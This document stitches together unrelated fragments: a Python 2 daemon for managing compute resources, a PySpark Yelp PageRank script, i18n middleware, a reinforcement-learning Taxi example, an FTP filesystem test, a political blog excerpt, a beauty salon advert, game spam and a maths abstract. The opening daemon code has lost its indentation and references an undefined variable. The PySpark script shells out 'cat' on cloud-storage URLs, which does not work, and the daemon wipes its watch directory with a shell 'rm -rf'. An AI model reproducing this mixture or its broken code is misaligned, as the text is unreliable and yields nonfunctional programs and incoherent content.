filename=event.fullpath[event.fullpath.rfind("/")+1:]
def process_IN_CLOSE_WRITE(self, event):
logger.debug('ResourceRanger-IN_CLOSE_WRITE: event '+event.fullpath)
global machine_blacklist
resourcepath=event.fullpath[0:event.fullpath.rfind("/")]
basename = os.path.basename(event.fullpath)
if basename.startswith('resource_summary'):return
if conf.role=='fu':return
if basename == os.uname()[1]:return
if basename.startswith('test'):return
if basename == 'blacklist':
with open(os.path.join(conf.watch_directory,'appliance','blacklist'),'r') as fi:
try:
machine_blacklist = json.load(fi)
except:
pass
if resourcepath.endswith('boxes'):
global boxinfoFUMap
if basename in machine_blacklist:
try:boxinfoFUMap.remove(basename)
except:pass
else:
current_time = time.time()
current_datetime = datetime.datetime.utcfromtimestamp(current_time)
emptyBox=False
try:
infile = fileHandler(event.fullpath)
if infile.data=={}:emptyBox=True
#check which time is later (in case of small clock skew and small difference)
if current_datetime > dateutil.parser.parse(infile.data['fm_date']):
dt = (current_datetime - dateutil.parser.parse(infile.data['fm_date'])).seconds
else:
dt = -(dateutil.parser.parse(infile.data['fm_date'])-current_datetime).seconds
if dt > 5:
logger.warning('setting stale flag for resource '+basename + ' which is '+str(dt)+' seconds behind')
#should be << 1s if NFS is responsive, set stale handle flag
infile.data['detectedStaleHandle']=True
elif dt < -5:
logger.error('setting stale flag for resource '+basename + ' which is '+str(dt)+' seconds ahead (clock skew)')
infile.data['detectedStaleHandle']=True
boxinfoFUMap[basename] = [infile.data,current_time,True]
except Exception as ex:
if not emptyBox:
logger.error("Unable to read of parse boxinfo file "+basename)
logger.exception(ex)
else:
logger.warning("got empty box file "+basename)
try:
boxinfoFUMap[basename][2]=False
except:
#boxinfo entry doesn't exist yet
boxinfoFUMap[basename]=[None,current_time,False]
def checkNotifiedBoxes(self,runNumber):
keys = boxinfoFUMap.keys()
c_time = time.time()
for key in keys:
#if key==thishost:continue #checked in inotify thread
try:
edata,etime,lastStatus = boxinfoFUMap[key]
except:
#key deleted
return False,False
if c_time - etime > 20:continue
#parsing or file access, check failed
if lastStatus==False: return False,False
try:
#run is found in at least one box
if runNumber in edata['activeRuns']:return True,True
except:
#invalid boxinfo data
return False,False
#all box data are valid, run not found
return True,False
def checkBoxes(self,runNumber):
checkSuccessful=True
runFound=False
ioErrCount=0
valErrCount=0
files = os.listdir(self.regpath[-1])
c_time = time.time()
for file in files:
if file == thishost:continue
#ignore file if it is too old (FU with a problem)
filename = os.path.join(dir,file)
if c_time - os.path.getmtime(filename) > 20:continue
try:
with open(filename,'r') as fp:
doc = json.load(fp)
except IOError as ex:
checkSuccessful=False
break
except ValueError as ex:
checkSuccessful=False
break
except Exception as ex:
logger.exception(ex)
checkSuccessful=False
break;
try:
if runNumber in doc['activeRuns']:
runFound=True
break;
except Exception as ex:
logger.exception(ex)
checkSuccessful=False
break
return checkSuccessful,runFound
class hltd(Daemon2,object):
    """Main hltd daemon.

    Reads the per-instance configuration, prepares FU/BU resources and
    mount points, starts the RunRanger and ResourceRanger inotify watchers,
    and serves the CGI web interface until interrupted.
    """
    def __init__(self, instance):
        # instance name (e.g. 'main') selects the configuration set
        self.instance=instance
        Daemon2.__init__(self,'hltd',instance,'hltd')

    def stop(self):
        """Request a clean shutdown of a running daemon.

        Touches 'populationcontrol' in the watch directory and polls (up to
        ~5 s) for the running daemon to consume it, then falls back to the
        regular Daemon2 stop.
        """
        #read configuration file
        try:
            setFromConf(self.instance)
        except Exception as ex:
            print " CONFIGURATION error:",str(ex),"(check configuration file) [ \033[1;31mFAILED\033[0;39m ]"
            sys.exit(4)
        if self.silentStatus():
            try:
                if os.path.exists(conf.watch_directory+'/populationcontrol'):
                    os.remove(conf.watch_directory+'/populationcontrol')
                # creating this file signals the daemon to terminate runs
                fp = open(conf.watch_directory+'/populationcontrol','w+')
                fp.close()
                count = 10
                while count:
                    # os.stat raises OSError once the daemon removed the file
                    os.stat(conf.watch_directory+'/populationcontrol')
                    if count==10:
                        sys.stdout.write(' o.o')
                    else:
                        sys.stdout.write('o.o')
                    sys.stdout.flush()
                    time.sleep(.5)
                    count-=1
            except OSError, err:
                time.sleep(.1)
                pass
            except IOError, err:
                time.sleep(.1)
                pass
        super(hltd,self).stop()

    def run(self):
        """Daemon main loop: configure, start watchers, serve HTTP.

        if role is not defined in the configuration (which it shouldn't)
        infer it from the name of the machine
        """
        #read configuration file
        setFromConf(self.instance)
        logger.info(" ")
        logger.info(" ")
        logger.info("[[[[ ---- hltd start : instance " + self.instance + " ---- ]]]]")
        logger.info(" ")
        if conf.enabled==False:
            logger.warning("Service is currently disabled.")
            sys.exit(1)
        if conf.role == 'fu':
            """
            cleanup resources
            """
            global cloud_mode
            # cores left in the cloud dir mean the machine rebooted/restarted
            # while in cloud mode
            is_in_cloud = len(os.listdir(cloud))>0
            while True:
                #switch to cloud mode if cloud files are found (e.g. machine rebooted while in cloud)
                if is_in_cloud:
                    logger.warning('found cores in cloud. this session will start in the cloud mode')
                    try:
                        move_resources_to_cloud()
                    except:
                        pass
                    cloud_mode=True
                    if is_cloud_inactive():
                        ignite_cloud()
                    break
                # retry resource cleanup until it succeeds
                if cleanup_resources()==True:break
                time.sleep(0.1)
                logger.warning("retrying cleanup_resources")
            """
            recheck mount points
            this is done at start and whenever the file /etc/appliance/bus.config is modified
            mount points depend on configuration which may be updated (by runcontrol)
            (notice that hltd does not NEED to be restarted since it is watching the file all the time)
            """
            cleanup_mountpoints()
            calculate_threadnumber()
            try:
                os.makedirs(conf.watch_directory)
            except:
                pass
            #recursively remove any stale run data and other commands in the FU watch directory
            #if conf.watch_directory.strip()!='/':
            #    p = subprocess.Popen("rm -rf " + conf.watch_directory.strip()+'/{run*,end*,quarantined*,exclude,include,suspend*,populationcontrol,herod,logrestart,emu*}',shell=True)
            #    p.wait()
            # only wipe the watch dir when it lives under /fff (safety guard)
            if conf.watch_directory.startswith('/fff'):
                p = subprocess.Popen("rm -rf " + conf.watch_directory+'/*',shell=True)
                p.wait()
            global fu_watchdir_is_mountpoint
            if os.path.ismount(conf.watch_directory):fu_watchdir_is_mountpoint=True
            #switch to cloud mode if active and hltd did not have cores in cloud directory in the last session
            if not is_in_cloud:
                if not is_cloud_inactive():
                    logger.warning("cloud is on on this host at hltd startup, switching to cloud mode")
                    move_resources_to_cloud()
                    cloud_mode=True
        if conf.role == 'bu':
            global machine_blacklist
            #update_success,machine_blacklist=updateBlacklist()
            machine_blacklist=[]
            global ramdisk_submount_size
            if self.instance == 'main':
                #if there are other instance mountpoints in ramdisk, they will be subtracted from size estimate
                ramdisk_submount_size = submount_size(conf.watch_directory)
        """
        the line below is a VERY DIRTY trick to address the fact that
        BU resources are dynamic hence they should not be under /etc
        """
        conf.resource_base = conf.watch_directory+'/appliance' if conf.role == 'bu' else conf.resource_base
        #@SM:is running from symbolic links still needed?
        watch_directory = os.readlink(conf.watch_directory) if os.path.islink(conf.watch_directory) else conf.watch_directory
        resource_base = os.readlink(conf.resource_base) if os.path.islink(conf.resource_base) else conf.resource_base
        global runList
        runList = RunList()
        if conf.use_elasticsearch == True:
            time.sleep(.2)
            restartLogCollector(self.instance)
        #start boxinfo elasticsearch updater
        global nsslock
        global boxInfo
        boxInfo = None
        if conf.role == 'bu':
            # appliance subdirs must exist before the watchers start
            try:os.makedirs(os.path.join(watch_directory,'appliance/dn'))
            except:pass
            try:os.makedirs(os.path.join(watch_directory,'appliance/boxes'))
            except:pass
            if conf.use_elasticsearch == True:
                boxInfo = BoxInfoUpdater(watch_directory,conf,nsslock,boxdoc_version)
                boxInfo.start()
        # RunRanger watches the top-level watch dir for run/command files
        runRanger = RunRanger(self.instance)
        runRanger.register_inotify_path(watch_directory,inotify.IN_CREATE)
        runRanger.start_inotify()
        logger.info("started RunRanger - watch_directory " + watch_directory)
        # derive the appliance dir (parent of the resource dir)
        appliance_base=resource_base
        if resource_base.endswith('/'):
            resource_base = resource_base[:-1]
        if resource_base.rfind('/')>0:
            appliance_base = resource_base[:resource_base.rfind('/')]
        rr = ResourceRanger()
        try:
            if conf.role == 'bu':
                imask = inotify.IN_CLOSE_WRITE | inotify.IN_DELETE | inotify.IN_CREATE | inotify.IN_MOVED_TO
                rr.register_inotify_path(resource_base, imask)
                rr.register_inotify_path(resource_base+'/boxes', imask)
            else:
                #status file for cloud
                #with open(os.path.join(watch_directory,'mode'),'w') as fp:
                #    json.dump({"mode":"hlt"},fp))
                #
                imask_appl = inotify.IN_MODIFY
                imask = inotify.IN_MOVED_TO
                rr.register_inotify_path(appliance_base, imask_appl)
                rr.register_inotify_path(resource_base+'/idle', imask)
                rr.register_inotify_path(resource_base+'/cloud', imask)
                rr.register_inotify_path(resource_base+'/except', imask)
            rr.start_inotify()
            logger.info("started ResourceRanger - watch_directory "+resource_base)
        except Exception as ex:
            logger.error("Exception caught in starting ResourceRanger notifier")
            logger.error(ex)
        try:
            cgitb.enable(display=0, logdir="/tmp")
            handler = CGIHTTPServer.CGIHTTPRequestHandler
            # the following allows the base directory of the http
            # server to be 'conf.watch_directory, which is writeable
            # to everybody
            if os.path.exists(watch_directory+'/cgi-bin'):
                os.remove(watch_directory+'/cgi-bin')
            os.symlink('/opt/hltd/cgi',watch_directory+'/cgi-bin')
            handler.cgi_directories = ['/cgi-bin']
            logger.info("starting http server on port "+str(conf.cgi_port))
            httpd = BaseHTTPServer.HTTPServer(("", conf.cgi_port), handler)
            logger.info("hltd serving at port "+str(conf.cgi_port)+" with role "+conf.role)
            os.chdir(watch_directory)
            logger.info("[[[[ ---- hltd instance " + self.instance + ": init complete, starting httpd ---- ]]]]")
            logger.info("")
            # blocks until KeyboardInterrupt (service stop) or error
            httpd.serve_forever()
        except KeyboardInterrupt:
            # orderly shutdown: runs, watchers, collectors, mounts
            logger.info("stop signal detected")
            aRuns = runList.getActiveRuns()
            if len(aRuns)>0:
                logger.info("terminating all ongoing runs")
                for run in aRuns:
                    if conf.role=='fu':
                        run.Shutdown(True,True)
                    elif conf.role=='bu':
                        run.ShutdownBU()
                logger.info("terminated all ongoing runs")
            runRanger.stop_inotify()
            rr.stop_inotify()
            if boxInfo is not None:
                logger.info("stopping boxinfo updater")
                boxInfo.stop()
            global logCollector
            if logCollector is not None:
                logger.info("terminating logCollector")
                logCollector.terminate()
            logger.info("stopping system monitor")
            rr.stop_managed_monitor()
            logger.info("closing httpd socket")
            httpd.socket.close()
            logger.info(threading.enumerate())
            logger.info("unmounting mount points")
            # one retry in case the first unmount attempt fails
            if cleanup_mountpoints(remount=False)==False:
                time.sleep(1)
                cleanup_mountpoints(remount=False)
            logger.info("shutdown of service (main thread) completed")
        except Exception as ex:
            logger.info("exception encountered in operating hltd")
            logger.info(ex)
            runRanger.stop_inotify()
            rr.stop_inotify()
            rr.stop_managed_monitor()
            raise
if __name__ == "__main__":
    # Set a friendly process name, then hand control to the Daemon2-based
    # service; argv[1] selects the hltd instance to run (e.g. 'main').
    import procname
    procname.setprocname('hltd')
    daemon = hltd(sys.argv[1])
    daemon.start()
|
In an earlier post, I noted the liberal record of unmitigated legislative disasters, the latest of which is now being played out in the financial markets before our eyes. Before the 1994 Republican takeover, Democrats had sixty years of virtually unbroken power in Congress - with substantial majorities most of the time. Can a group of smart people, studying issue after issue for years on end, with virtually unlimited resources at their command, not come up with a single policy that works? Why are they chronically incapable?
|
#!/usr/bin/python2
# -*- coding: utf-8 -*-
from pyspark.sql.functions import *
from graphframes import *
"""
If you do it on the Jupyter Notebook, do the following config.
%%configure -f
{ "conf": {"spark.jars.packages": "graphframes:graphframes:0.3.0-spark2.0-s_2.11" }}
sc.addPyFile('wasb://5003@network5003.blob.core.windows.net/graphframes-0.3.0-spark2.0-s_2.11.jar')
"""
def network(sc, spark):
# step1: create graph according to yelp network data
v = spark.read.csv(
'https://5003@network5003.blob.core.windows.net/yelpNetwork_i.csv', header=True, inferSchema=True)
# v.count() 1029432
e = spark.read.csv(
'wasb://5003@network5003.blob.core.windows.net/yelpNetwork_e.csv', header=True, inferSchema=True)
# e.count() 29723247
g = GraphFrame(v, e)
# step2: we need to make sure that this graph is a directed graph
# then we can run pagerank algorithm on it
a = g.inDegrees
# b=g.outDegrees.withColumnRenamed('id','out_id')
b = g.outDegrees
# inOut=a.join(b,a['id']==b['out_id'])
inOut = a.join(b, 'id')
static = inOut.select(
'*', (inOut['inDegree'] / inOut['outDegree']).alias('ratio')).select('id', 'ratio')
bio_ratio = float(static.filter("ratio=1").count()) / \
float(g.vertices.count())
print bio_ratio
# step3: detect connected component
sc.setCheckpointDir(
'wasb://5003@network5003.blob.core.windows.net/checkpoint')
result = g.connectedComponents()
r = result.select("id", "component")
r.groupBy('component').count().orderBy('count', ascending=False).show()
# step4: choose the largest connected component, create a new subset
# graph, and run pagerank algorithm on this new graph
subset_0 = result.filter('component=0')
subset_id = subset_0.select('id')
subset_edge = e.join(subset_id, e['dst'] == subset_0['id'], 'leftsemi').join(
subset_id, e['src'] == subset_0['id'], 'leftsemi')
g_cc = GraphFrame(subset_id, subset_edge)
pr = g_cc.pageRank(resetProbability=0.01, maxIter=10)
pr.vertices.select("id", "pagerank").orderBy(
"pagerank", ascending=False).show()
# step5: we want to get the max pagerank vertices for each business, so we
# need (business_id,user_id) pair, extracted from review
review = spark.read.csv(
'wasb://5003@network5003.blob.core.windows.net/yelpNetwork_b_u.csv', header=True, inferSchema=True)
# but if the number of one business's comment is too small, it will be meaningless for them to distribute coupons according
# to this network's results, for they do not have enough data and do not have enough user to expand influence in cascanding.
# so we first groupBy business id and extract subset of business whose users' number is more than 100
# we consider these business is meaningful to use max pagerank user to express their coupons or make advertisement influence
# on new dishes or event
# in order to avoid spark bug on groupBy, we add withColumnRenamed before
# every groupBy operation
cnt = review.withColumnRenamed('business_id', 'business_id').groupBy(
'business_id').count().filter('count>200')
subset = cnt.join(review, 'business_id')
# pr_results_business=pr.join(subset,pr['id']==subset['user_id']).select("user_id","pagerank","business_id") /
# .withColumnRenamed('business_id','business_id').groupBy('business_id').max()
pr_table = pr.vertices.select("id", "pagerank").orderBy(
"pagerank", ascending=False)
pr_results_business = pr_table.join(
subset, pr_table['id'] == subset['user_id'])
pr_results_business.select("user_id", "pagerank", "business_id").show()
t1 = pr_results_business.select("user_id", "pagerank", "business_id").withColumnRenamed(
'business_id', 'business_id').groupBy('business_id').max()
t2 = t1.join(pr_table, t1['max(pagerank)'] == pr_table['pagerank']).withColumnRenamed(
'id', 'user_id').select('business_id', 'user_id')
t2.show()
# step6: write result into csv file.
# For default setting, spark will write it into multi-csvfile
# distributely, we need to merge them into one csv file.
import os
from subprocess import call
t2.write.format('com.databricks.spark.csv').save(
'wasb://5003@network5003.blob.core.windows.net/result.csv')
os.system("cat wasb://5003@network5003.blob.core.windows.net/result/p* > wasb://5003@network5003.blob.core.windows.net/result.csv")
pr_table.write.format('com.databricks.spark.csv').save(
'wasb://5003@network5003.blob.core.windows.net/pr.csv')
os.system("cat wasb://5003@network5003.blob.core.windows.net/pr/p* > wasb://5003@network5003.blob.core.windows.net/pr.csv")
# evaluation
res = spark.read.csv(
'wasb://5003@network5003.blob.core.windows.net/result.csv', header=True, inferSchema=True)
cnt = 0
lgt = 0
for row in res.rdd.collect():
id = row['user_id']
print id
con = "a.id='" + id + "'"
con = str(con)
print con
top = g.find(
"(a)-[]->(b);(b)-[]->(c)").filter(con).select("c.id").distinct().count()
print top
test = v.rdd.takeSample(False, 1, seed=cnt)
for t in test:
random = t['id']
con1 = "a.id='" + random + "'"
con1 = str(con1)
random = g.find(
"(a)-[]->(b);(b)-[]->(c)").filter(con1).select("c.id").distinct().count()
print random
if top > random:
lgt = lgt + 1
cnt = cnt + 1
# ratio: 96.7%, means it's meaningful to use this system to recommend
# users for business
|
The Secret Therapist is passionate about transforming your beauty and well-being while offering you the chance to experience high quality treatments in a cosy, welcoming and friendly environment.
Our services at The Secret Therapist include a wide range of facials, body conditioning treatments, massage therapies, hand and foot treats, gel polish, tanning, make up and false lash application, brow and eye treatments, waxing, male grooming, packages and gift vouchers. We only use the best formulated product lines such as MONU by Susan Molyneux, Neals Yard Remedies, Fake Bake, Jessica and Leighton Denny, Mii Cosmetics and our very own (UKs first) branded Odara Mineral Beauty makeup. Luxurious quality at affordable prices. The Secret Therapist can be found in our new premises within Fit Studio in East Kilbride. We have had the pleasure of working with some of the country's elite who remain loyal to us today. Beauty and massage treatments are no longer considered a luxury but a necessity in the hectic modern world in which we now live. At The Secret Therapist, it is our aim to help alleviate some of your stresses and strains and delivering the relaxation and glamour right for your needs. Take a look at our website for more information.
Success comes from hard work and determination, from hard knocks and difficult lessons, from research and not being frightened to try something new and venture out into the unknown. We treat all our clients at a uniquely personal level from the heart and soul. We care about you and your experience turning us into the thriving company we see today!
Relax....remember it's about YOU and your commitment to one another.
Direct one-to-one contact from the beginning. A good set of ears is required. A detailed description of requirements is taken and, if possible, we liaise with the other organisers involved so as to avoid clashes. Our couples need to feel they can trust us and rest assured they can rely on us to support their process right up until, and on, the big day.
Everything! The people I meet, the treatments and surroundings in which they are experienced, the chance to enjoy the products and the relationships that form.
Skincare! Putting yourself first! Start a good skincare regime at least 6 months prior to your wedding date. So often do I meet brides who, in actual fact, don't spend time on themselves really. Adopt a regular facial and body care routine. Packages can be tailored to suit and advice given free of charge.
I like to keep organised myself. Be on time. Ensure everyone is aware of who's doing what, when and where. Regular contact and great communication is imperative.
Carry a refreshing toning spritz in your bag (if you have one). Discreetly spray a mist over your face at intervals. This helps to keep cool, lower stress levels and help your makeup last longer too.
Bridebook Discount: 50% off all products purchased in salon.
Bridebook Special Offer: Further exclusive discounts on additional treatments and services when purchasing in conjunction with your wedding, for your guests, and when returning.
|
# Copyright 2017 QuantRocket - All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import yaml
import json
import requests
def json_to_cli(func, *args, **kwargs):
    """
    Call *func* and convert its JSON response to an (output, exit_code)
    tuple suitable for the CLI.

    If the QUANTROCKET_CLI_OUTPUT_FORMAT environment variable is set to
    "json", the response is returned serialized as-is. Otherwise:

    - if the JSON is empty, the output is None;
    - if the JSON is a list of scalars, the output is simplified to a
      string of newline-separated values suitable for the command line
      (unless the keyword option ``simplify_list`` is False);
    - otherwise the response is rendered as YAML.

    An HTTPError raised by *func* yields exit code 1 and the service's
    JSON error payload when available.
    """
    exit_code = 0
    # pop the option so it is not forwarded to func
    simplify_list = kwargs.pop("simplify_list", True)
    try:
        json_response = func(*args, **kwargs)
    except requests.exceptions.HTTPError as e:
        # use json response from service, if available
        json_response = getattr(e, "json_response", {}) or {"status": "error", "msg": repr(e)}
        exit_code = 1
    if not json_response:
        return None, exit_code
    if os.environ.get("QUANTROCKET_CLI_OUTPUT_FORMAT", "").lower() == "json":
        return json.dumps(json_response), exit_code
    # flatten a list of scalars to newline-separated values (generator
    # expression instead of a throwaway list inside any())
    if simplify_list and isinstance(json_response, list) and not any(
            isinstance(item, (dict, list, tuple, set)) for item in json_response):
        return "\n".join([str(item) for item in json_response]), exit_code
    return yaml.safe_dump(json_response, default_flow_style=False).strip(), exit_code
|
Tank Trouble Game: playing games can open up a whole new field of adventure from your home. This informative article includes advice for enhancing your game-playing time with tricks and tips you may not be aware of. For further tips, continue reading.
Tank Trouble 2 Online video game playing has rapidly overtaken the world. Worldwide, people are enjoying the understanding that can be obtained together with the enjoyable. Irrespective of what you want to do, you'll locate a name to thrill you. This information has some tips on how to acquire more out of your video gaming encounter.
|
import re
from uliweb.i18n import set_language, format_locale
from uliweb import Middleware
from logging import getLogger
from uliweb.utils.common import request_url
accept_language_re = re.compile(r'''
([A-Za-z]{1,8}(?:-[A-Za-z]{1,8})*|\*) # "en", "en-au", "x-y-z", "*"
(?:;q=(0(?:\.\d{,3})?|1(?:.0{,3})?))? # Optional "q=1.00", "q=0.8"
(?:\s*,\s*|$) # Multiple accepts per header.
''', re.VERBOSE)
def get_language_from_request(request, settings):
    """Determine the language to use for *request*.

    Sources are consulted in priority order:

    1. URL query-string parameter (key from settings ``I18N/URL_LANG_KEY``)
    2. session value ``'uliweb_language'``
    3. language cookie (``settings.I18N.LANGUAGE_COOKIE_NAME``)
    4. HTTP Accept-Language header, matched against ``SUPPORT_LANGUAGES``
    5. fallback: ``settings.I18N`` ``LANGUAGE_CODE``

    Passing ``__debug__`` in the query string logs which source matched.
    """
    #check query_string, and the key will be defined in settings.ini
    #now only support GET method
    debug = '__debug__' in request.GET
    log = getLogger(__name__)
    url_lang_key = settings.get_var('I18N/URL_LANG_KEY')
    if url_lang_key:
        lang = request.GET.get(url_lang_key)
        if lang:
            if debug:
                log.info('Detect from URL=%s, lang_key=%s, lang=%s' %
                    (request_url(), url_lang_key, lang))
            return lang

    #check session
    if hasattr(request, 'session'):
        lang = request.session.get('uliweb_language')
        if lang:
            if debug:
                log.info('Detect from session=%s, lang=%s' %
                    ('uliweb_language', lang))
            return lang

    #check cookie
    lang = request.cookies.get(settings.I18N.LANGUAGE_COOKIE_NAME)
    if lang:
        if debug:
            log.info('Detect from cookie=%s, lang=%s' %
                (settings.I18N.LANGUAGE_COOKIE_NAME, lang))
        return lang

    #check browser HTTP_ACCEPT_LANGUAGE header
    accept = request.environ.get('HTTP_ACCEPT_LANGUAGE', None)
    if not accept:
        # bugfix: assign the fallback before logging; previously the debug
        # message printed the stale (falsy) cookie value instead of the
        # language actually returned
        lang = settings.I18N.get('LANGUAGE_CODE')
        if debug:
            log.info('Detect from settings of LANGUAGE_CODE=%s' % lang)
        return lang

    languages = settings.I18N.get('SUPPORT_LANGUAGES', [])
    for accept_lang, unused in parse_accept_lang_header(accept):
        if accept_lang == '*':
            break
        # normalize e.g. 'en-au' to the project's locale format
        normalized = format_locale(accept_lang)
        if not normalized:
            continue
        if normalized in languages:
            if debug:
                log.info('Detect from HTTP Header=%s, lang=%s' %
                    ('HTTP_ACCEPT_LANGUAGE', normalized))
            return normalized

    #return default language
    lang = settings.I18N.get('LANGUAGE_CODE')
    if debug:
        log.info('Detect from settings of LANGUAGE_CODE=%s' % lang)
    return lang
def parse_accept_lang_header(lang_string):
    """
    Parses the lang_string, which is the body of an HTTP Accept-Language
    header, and returns a list of (lang, q-value) tuples ordered by
    descending 'q' value.

    Any format errors in lang_string result in an empty list being returned.
    """
    result = []
    pieces = accept_language_re.split(lang_string)
    if pieces[-1]:
        # trailing text the regex could not consume -> malformed header
        return []
    # re.split yields (gap, lang, q-value) triples; the gap before each
    # match must be empty for a well-formed header.
    for i in range(0, len(pieces) - 1, 3):
        first, lang, priority = pieces[i : i + 3]
        if first:
            return []
        # A missing q-value defaults to 1.0 per RFC 2616/7231. bugfix: an
        # explicit q=0 now yields 0.0 — the old `priority and float(...) or
        # 1.0` idiom mapped the falsy 0.0 back to 1.0.
        priority = float(priority) if priority else 1.0
        result.append((lang, priority))
    # Stable sort by descending quality; works on Python 2 and 3, unlike
    # the previous cmp()-based sort.
    result.sort(key=lambda pair: pair[1], reverse=True)
    return result
class I18nMiddle(Middleware):
    # Middleware hook: resolve the preferred language for each incoming
    # request and activate it via set_language. Returns nothing, so request
    # processing continues normally.
    def process_request(self, request):
        lang = get_language_from_request(request, self.settings)
        if lang:
            set_language(lang)
|
Unione Sportiva Sassuolo Calcio, also known as Sassuolo or I Neroverdi (The Black-and-Greens), is a football team that currently participates in the Serie A, the top tier of the Italian football system, after becoming champions of the Serie B and achieving promotion in 2013. The club was founded in 1922 and they hold home games at the Stadio Città del Tricolore, with a capacity of 20,084 viewers. Their shirt has vertical black and green stripes, which earns them their nickname. In their track record, we can find honours such as having won the Serie B, the Serie C1, and the TIM trophy. Come watch this team on its way up in the Serie A, buy here your tickets to see Sassuolo play live.
We will notify you when tickets for Sassuolo become available.
Register for an alert when tickets are available to buy for Sassuolo.
|
#!/usr/bin/env python
# Python imports.
import sys
# Other imports.
import srl_example_setup
from simple_rl.agents import QLearningAgent, RandomAgent
from simple_rl.tasks import TaxiOOMDP
from simple_rl.run_experiments import run_agents_on_mdp, run_single_agent_on_mdp
def main(open_plot=True):
    """Compare a Q-learning agent against a random agent on a 4x4 Taxi OOMDP.

    Args:
        open_plot (bool): forwarded to run_agents_on_mdp; when True the
            resulting comparison plot is opened after the experiment.
    """
    # Initial state: taxi at (1, 1) with no passenger; one passenger at
    # (3, 2) whose destination is (2, 3); no interior walls.
    taxi_attrs = {"x": 1, "y": 1, "has_passenger": 0}
    passenger_attrs = [{"x": 3, "y": 2, "dest_x": 2, "dest_y": 3, "in_taxi": 0}]
    wall_list = []
    mdp = TaxiOOMDP(width=4, height=4, agent=taxi_attrs, walls=wall_list,
                    passengers=passenger_attrs)

    # Agents under comparison.
    learner = QLearningAgent(actions=mdp.get_actions())
    baseline = RandomAgent(actions=mdp.get_actions())

    visualize = False
    if visualize:
        # Train the Q-learner, then render its behaviour in the Taxi viewer.
        run_single_agent_on_mdp(learner, mdp, episodes=50, steps=1000)
        mdp.visualize_agent(learner)
    else:
        # Run the experiment and produce a comparison plot.
        run_agents_on_mdp([learner, baseline], mdp, instances=10, episodes=1,
                          steps=500, reset_at_terminal=True, open_plot=open_plot)
if __name__ == "__main__":
    # Pass "no_plot" as the last CLI argument to suppress the plot window.
    # (Equivalent to the original ``not sys.argv[-1] == "no_plot"`` but
    # without relying on operator precedence.)
    main(open_plot=(sys.argv[-1] != "no_plot"))
|
Copyright © 1988 Derming Wang. This is an open access article distributed under the Creative Commons Attribution License, which permits unrestricted use, distribution, and reproduction in any medium, provided the original work is properly cited.
It is shown that inversion is a convex function on the set of strictly positive elements of a C*-algebra.
|
#!/usr/bin/env python
from fs.tests import FSTestCases, ThreadingTestCases
import unittest
import os
import sys
import shutil
import tempfile
import subprocess
import time
from os.path import abspath
import urllib
from six import PY3
try:
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
except ImportError:
if not PY3:
raise ImportError("Requires pyftpdlib <http://code.google.com/p/pyftpdlib/>")
from fs.path import *
from fs import ftpfs
ftp_port = 30000
class TestFTPFS(unittest.TestCase, FSTestCases, ThreadingTestCases):
    """Exercises fs.ftpfs.FTPFS against a real pyftpdlib FTP server.

    Each test launches this very file as a subprocess (see the __main__
    block below), which serves a fresh temporary directory over FTP.  The
    actual test methods come from the FSTestCases/ThreadingTestCases mixins.
    """

    # pyftpdlib could not be imported under Python 3 (see imports above),
    # so the whole class is disabled there.
    __test__ = not PY3

    def setUp(self):
        # Bump the module-level port so every test gets a fresh port and
        # cannot collide with a lingering server from a previous test.
        global ftp_port
        ftp_port += 1
        use_port = str(ftp_port)
        #ftp_port = 10000
        self.temp_dir = tempfile.mkdtemp(u"ftpfstests")
        file_path = __file__
        if ':' not in file_path:
            file_path = abspath(file_path)
        # Apparently Windows requires values from default environment, so copy the existing os.environ
        env = os.environ.copy()
        env['PYTHONPATH'] = os.getcwd() + os.pathsep + env.get('PYTHONPATH', '')
        # Launch this same file as a standalone FTP server process serving
        # temp_dir on use_port (handled by the __main__ block below).
        self.ftp_server = subprocess.Popen([sys.executable,
                                            file_path,
                                            self.temp_dir,
                                            use_port],
                                           stdout=subprocess.PIPE,
                                           env=env)
        # Block until the server writes a line to stdout
        self.ftp_server.stdout.readline()
        # Poll until a connection can be made
        start_time = time.time()
        while time.time() - start_time < 5:
            try:
                ftpurl = urllib.urlopen('ftp://127.0.0.1:%s' % use_port)
            except IOError:
                # Server not accepting connections yet; yield and retry.
                time.sleep(0)
            else:
                ftpurl.read()
                ftpurl.close()
                break
        else:
            # Avoid a possible infinite loop
            raise Exception("Unable to connect to ftp server")
        self.fs = ftpfs.FTPFS('127.0.0.1', 'user', '12345', dircache=True, port=use_port, timeout=5.0)
        self.fs.cache_hint(True)

    def tearDown(self):
        #self.ftp_server.terminate()
        # Kill the server process by PID; terminate() is deliberately
        # avoided (see commented line above) -- presumably for portability
        # with older Python versions.  TODO confirm.
        if sys.platform == 'win32':
            os.popen('TASKKILL /PID '+str(self.ftp_server.pid)+' /F')
        else:
            os.system('kill '+str(self.ftp_server.pid))
        shutil.rmtree(self.temp_dir)
        self.fs.close()

    def check(self, p):
        # Map an FS path onto the served temp directory and test existence
        # directly on the local filesystem.
        check_path = self.temp_dir.rstrip(os.sep) + os.sep + p
        return os.path.exists(check_path.encode('utf-8'))
if __name__ == "__main__":
    # Run an ftp server that exposes a given directory
    # argv[1]: directory to serve; argv[2]: port to listen on.
    import sys
    authorizer = DummyAuthorizer()
    # Full permissions ("elradfmw") for the test user; anonymous read access.
    authorizer.add_user("user", "12345", sys.argv[1], perm="elradfmw")
    authorizer.add_anonymous(sys.argv[1])
    #def nolog(*args):
    #    pass
    #ftpserver.log = nolog
    #ftpserver.logline = nolog
    handler = FTPHandler
    handler.authorizer = authorizer
    address = ("127.0.0.1", int(sys.argv[2]))
    #print address
    ftpd = FTPServer(address, handler)
    # The parent test process blocks reading this line (see setUp above);
    # writing it signals that the server is about to start.
    sys.stdout.write('serving\n')
    sys.stdout.flush()
    ftpd.serve_forever()
|
